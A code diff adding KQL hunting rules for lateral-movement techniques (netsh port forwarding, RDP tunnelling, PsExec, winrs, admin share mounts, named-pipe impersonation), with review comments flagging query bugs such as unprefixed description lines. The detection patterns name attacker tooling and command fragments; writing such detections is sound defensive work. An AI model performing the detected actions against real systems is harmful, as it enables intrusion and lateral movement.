+| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql b/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql
new file mode 100644
index 00000000..0804f14d
--- /dev/null
+++ b/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql
@@ -0,0 +1,13 @@
+// Title: New PortProxy Registry Entry Added
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-06-22
+// Level: medium
+// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)
+// - Synergy Software KVM (https://symless.com/synergy)
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services\\PortProxy\\v4tov4\\tcp*"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
new file mode 100644
index 00000000..db0ceee6
--- /dev/null
+++ b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
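Review bot: The trailing `*` in `RegistryKey endswith "\\Services\\PortProxy\\v4tov4\\tcp*"` is a literal asterisk, because KQL `endswith` does not interpret wildcards, so the query requires the key path to end in the character `*` and will never match a real PortProxy key; this looks like a Sigma wildcard that survived conversion. Change the clause to `| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp"` (or `endswith` without the asterisk) so that the `tcp` key and the forwarding entries written beneath it are matched.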
@@ -0,0 +1,14 @@
+// Title: New Remote Desktop Connection Initiated Via Mstsc.EXE
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
+Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.001
+// False Positives:
+// - WSL (Windows Sub System For Linux)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -v:" or ProcessCommandLine contains " /v:" or ProcessCommandLine contains " –v:" or ProcessCommandLine contains " —v:" or ProcessCommandLine contains " ―v:") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql
new file mode 100644
index 00000000..03f89a4b
--- /dev/null
+++ b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql
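Review bot: The second description line `Adversaries may use valid accounts to log into a computer ...` is emitted without a `//` prefix, so the file is not a syntactically valid KQL query and will fail to parse when pasted into Advanced Hunting; it needs to become `// Adversaries may use valid accounts ...`. This appears to be a general gap in the converter's handling of multi-line Sigma descriptions, so it is worth fixing there rather than per file.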
@@ -0,0 +1,14 @@
+// Title: Outbound RDP Connections Over Non-Standard Tools
+// Author: Markus Neis
+// Date: 2019-05-15
+// Level: high
+// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.
+An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
+
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002
+// False Positives:
+// - Third party RDP tools
+
+DeviceNetworkEvents
+| where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ "")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql
new file mode 100644
index 00000000..3ec120ed
--- /dev/null
+++ b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql
@@ -0,0 +1,10 @@
+// Title: Potential DCOM InternetExplorer.Application DLL Hijack
+// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
new file mode 100644
index 00000000..1a20a4ef
--- /dev/null
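Review bot: The description continuation `An initial baseline is required before using this utility ...` in the outbound-RDP rule has no `//` prefix, which makes the whole file an invalid KQL query; it should read `// An initial baseline is required ...`. In the exclusion list, `InitiatingProcessFolderPath =~ ""` appears twice and sits next to a separate `isnull(InitiatingProcessFolderPath)` term; the three can be collapsed into a single `isempty(InitiatingProcessFolderPath)`, and it is worth a comment that this deliberately drops every connection MDE could not attribute to a process, since that is also where an unattributed tunnel would hide.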
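Review bot: The DCOM file-write rule keys on `InitiatingProcessFolderPath =~ "System"`, but that column holds a directory path; for writes performed by the kernel (PID 4, the Sysmon `Image: System` case this rule was ported from) MDE typically reports the process name in `InitiatingProcessFileName` and leaves the folder path empty, in which case this exact match never fires. Suggest `| where (InitiatingProcessId == 4 or InitiatingProcessFileName =~ "System") and FolderPath endswith "\\Internet Explorer\\iertutil.dll"`, and confirm against a sample SMB-write event in your tenant which of the two columns carries the value.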
+++ b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
@@ -0,0 +1,10 @@
+// Title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
+// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
new file mode 100644
index 00000000..ba3cdbcd
--- /dev/null
+++ b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
@@ -0,0 +1,11 @@
+// Title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
+// Author: Aaron Stratton
+// Date: 2023-11-13
+// Level: high
+// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
+
+// MITRE Tactic: Lateral Movement
+// Tags: attack.t1021.003, attack.lateral-movement
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql
new file mode 100644
index 00000000..1d58721a
--- /dev/null
+++ b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql
@@ -0,0 +1,13 @@
+// Title: Potential Lateral Movement via Windows Remote Shell
+// Author: Liran Ravich
+// Date: 2025-10-22
+// Level: medium
+// Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
+
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.006
+// False Positives:
+// - Legitimate use of WinRM within the organization
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\winrshost.exe" and (not(FolderPath =~ "C:\\Windows\\System32\\conhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql b/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql
new file mode 100644
index 00000000..86dc13f4
--- /dev/null
+++ b/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential MSTSC Shadowing Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-01-24
+// Level: high
+// Description: Detects RDP session hijacking by using MSTSC shadowing
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1563.002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql b/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql
new file mode 100644
index 00000000..a709c271
--- /dev/null
+++ b/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql
@@ -0,0 +1,10 @@
+// Title: Potential Remote Desktop Tunneling
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql b/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql
new file mode 100644
index 00000000..2af67c7b
--- /dev/null
+++ b/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql
@@ -0,0 +1,12 @@
+// Title: Privilege Escalation via Named Pipe Impersonation
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021
+// False Positives:
+// - Other programs that cause these patterns (please report)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE")))
\ No newline at end of file
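Review bot: KQL `contains` is case-insensitive, so the upper-case SSH/plink switches ` -L `, ` -P ` and ` -R ` in the tunneling rule also match the lower-case ` -l ` (login name), ` -p ` (port) and ` -r ` forms, which widens the rule to almost any SSH invocation that mentions `:3389`. If the switch case matters for the intended signal, use `contains_cs` for those three terms, e.g. `ProcessCommandLine contains_cs " -L " or ProcessCommandLine contains_cs " -P " or ProcessCommandLine contains_cs " -R "`, and leave ` -pw ` and ` -ssh ` as they are.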
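Review bot: The named-pipe rule's description ("Detects a remote file copy attempt to a hidden network share") does not describe the query, which looks for `echo ... > \\.\pipe\...` from cmd or PowerShell, i.e. a client writing into a named pipe as seen with Meterpreter-style getsystem impersonation; an analyst reading the alert text will look for SMB copies that are not there. Suggest `// Description: Detects cmd.exe or PowerShell echoing data into a named pipe (\\.\pipe\...), a pattern used by named-pipe impersonation privilege-escalation techniques such as Meterpreter's getsystem.`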
diff --git a/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql b/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql
new file mode 100644
index 00000000..02bac7ad
--- /dev/null
+++ b/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql
@@ -0,0 +1,12 @@
+// Title: PSEXEC Remote Execution File Artefact
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-21
+// Level: high
+// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.privilege-escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql
new file mode 100644
index 00000000..889509a6
--- /dev/null
+++ b/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql
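Review bot: `FolderPath startswith "C:\\Windows\\PSEXEC-"` hard-codes the system drive, so hosts whose Windows directory lives on another drive letter never match, and the description says the artefact is created on every PsExec run, so the miss is silent. `FolderPath contains ":\\Windows\\PSEXEC-" and FolderPath endswith ".key"` keeps the same intent without the drive assumption; restricting to `ActionType == "FileCreated"` would additionally match the "creation" wording of the description.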
@@ -0,0 +1,12 @@
+// Title: RDP Port Forwarding Rule Added Via Netsh.EXE
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2019-01-29
+// Level: high
+// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql b/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql
new file mode 100644
index 00000000..d82633f6
--- /dev/null
+++ b/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 Execution Without Parameters
+// Author: Bartlomiej Czyz, Relativity
+// Date: 2021-01-31
+// Level: high
+// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002
+// False Positives:
+// - False positives may occur if a user called rundll32 from CLI with no options
+
+DeviceProcessEvents
+| where ProcessCommandLine in~ ("rundll32.exe", "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql b/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql
new file mode 100644
index 00000000..271a9cbf
--- /dev/null
+++ b/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql
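Review bot: In the rundll32 hunk the exact match `ProcessCommandLine in~ ("rundll32.exe", "rundll32")` misses the same no-argument launch whenever the recorded command line is quoted or carries the image path, e.g. `"rundll32.exe"` or `C:\Windows\System32\rundll32.exe`; how the launcher formats it varies, so the high-severity rule can silently miss the exact case it is written for. Consider normalising before comparing, `| where trim(@'[" ]+', ProcessCommandLine) in~ ("rundll32.exe", "rundll32", "C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\SysWOW64\\rundll32.exe")`, or matching `FolderPath endswith "\\rundll32.exe"` together with an argument-free command line. Confirm against your own telemetry before widening, since the quoted form is an assumption on my part.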
@@ -0,0 +1,12 @@
+// Title: Suspicious Csi.exe Usage
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-17
+// Level: medium
+// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.execution, attack.t1072, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage by software developers
+
+DeviceProcessEvents
+| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql b/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql
new file mode 100644
index 00000000..7dc91359
--- /dev/null
+++ b/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious RDP Redirect Using TSCON
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-17
+// Level: high
+// Description: Detects a suspicious RDP session redirect using tscon.exe
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1563.002, attack.t1021.001, car.2013-07-002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /dest:rdp-tcp#"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql b/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql
new file mode 100644
index 00000000..38e1b84c
--- /dev/null
+++ b/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious SysAidServer Child
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-26
+// Level: medium
+// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1210
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql b/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql
new file mode 100644
index 00000000..0fd38a29
--- /dev/null
+++ b/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious UltraVNC Execution
+// Author: Bhabesh Raj
+// Date: 2022-03-04
+// Level: high
+// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.g0047, attack.t1021.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..642e7576
--- /dev/null
+++ b/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Windows Admin Share Mount Via Net.EXE
+// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects when an admin share is mounted using net.exe
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+// False Positives:
+// - Administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..1658894f
--- /dev/null
+++ b/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: Windows Internet Hosted WebDav Share Mount Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-21
+// Level: high
+// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..b32fbc80
--- /dev/null
+++ b/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Windows Share Mount Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-02
+// Level: low
+// Description: Detects when a share is mounted using the "net.exe" utility
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+// False Positives:
+// - Legitimate activity by administrators and scripts
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql
new file mode 100644
index 00000000..bf99d8de
--- /dev/null
+++ b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql
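Review bot: The command-line clause is `contains " use " or contains " \\\\"`, so a bare `net use` that merely lists existing connections, and any net.exe command that happens to contain a UNC path (`net view \\host`), both satisfy the rule even though the title and description are about a share being mounted, which needs both fragments together. If the upstream Sigma rule expresses this as `contains|all`, the `or` is a translation error rather than a design choice; either way `| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " \\\\") and (...)` is what the text promises. The rule is level low, so the cost is triage noise rather than missed detections, but it is worth fixing in the converter if it is systematic.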
@@ -0,0 +1,14 @@
+// Title: Winrs Local Command Execution
+// Author: Liran Ravich, Nasreddine Bencherchali
+// Date: 2025-10-22
+// Level: high
+// Description: Detects the execution of Winrs.exe where it is used to execute commands locally.
+Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
+
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (ProcessCommandLine contains "-r:localhost" or ProcessCommandLine contains "/r:localhost" or ProcessCommandLine contains "–r:localhost" or ProcessCommandLine contains "—r:localhost" or ProcessCommandLine contains "―r:localhost" or ProcessCommandLine contains "-r:127.0.0.1" or ProcessCommandLine contains "/r:127.0.0.1" or ProcessCommandLine contains "–r:127.0.0.1" or ProcessCommandLine contains "—r:127.0.0.1" or ProcessCommandLine contains "―r:127.0.0.1" or ProcessCommandLine contains "-r:[::1]" or ProcessCommandLine contains "/r:[::1]" or ProcessCommandLine contains "–r:[::1]" or ProcessCommandLine contains "—r:[::1]" or ProcessCommandLine contains "―r:[::1]" or ProcessCommandLine contains "-remote:localhost" or ProcessCommandLine contains "/remote:localhost" or ProcessCommandLine contains "–remote:localhost" or ProcessCommandLine contains "—remote:localhost" or ProcessCommandLine contains "―remote:localhost" or ProcessCommandLine contains "-remote:127.0.0.1" or ProcessCommandLine contains "/remote:127.0.0.1" or ProcessCommandLine contains "–remote:127.0.0.1" or ProcessCommandLine contains "—remote:127.0.0.1" or ProcessCommandLine contains "―remote:127.0.0.1" or ProcessCommandLine contains "-remote:[::1]" or ProcessCommandLine contains "/remote:[::1]" or ProcessCommandLine contains "–remote:[::1]" or 
ProcessCommandLine contains "—remote:[::1]" or ProcessCommandLine contains "―remote:[::1]")) or ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (not((ProcessCommandLine contains "-r:" or ProcessCommandLine contains "/r:" or ProcessCommandLine contains "–r:" or ProcessCommandLine contains "—r:" or ProcessCommandLine contains "―r:" or ProcessCommandLine contains "-remote:" or ProcessCommandLine contains "/remote:" or ProcessCommandLine contains "–remote:" or ProcessCommandLine contains "—remote:" or ProcessCommandLine contains "―remote:"))))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql b/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
new file mode 100644
index 00000000..572e0532
--- /dev/null
+++ b/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
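Review bot: The generated file contains a bare, uncommented line `Commands executed this way are launched under Winrshost.exe …` right after the `// Description:` line, because the multi-line Sigma description was emitted as a second line without the `//` prefix; KQL will parse that line as a statement and the whole rule fails to compile. Either join the continuation into the description line or prefix every continuation with `// ` — the converter should do this for any description that spans several lines, since the same defect appears in other rules of this patch. The Unicode dash variants (`–`, `—`, `―`) in the `-r:`/`-remote:` checks are a good touch; the second branch (winrs.exe with no `-r:`/`-remote:` at all) will also match `winrs -?`, which may deserve a false-positive note.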
@@ -0,0 +1,13 @@
+// Title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-09-02
+// Level: medium
+// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.privilege-escalation, attack.persistence, attack.t1546.003
+// False Positives:
+// - Legitimate event consumers
+// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
+
+DeviceImageLoadEvents
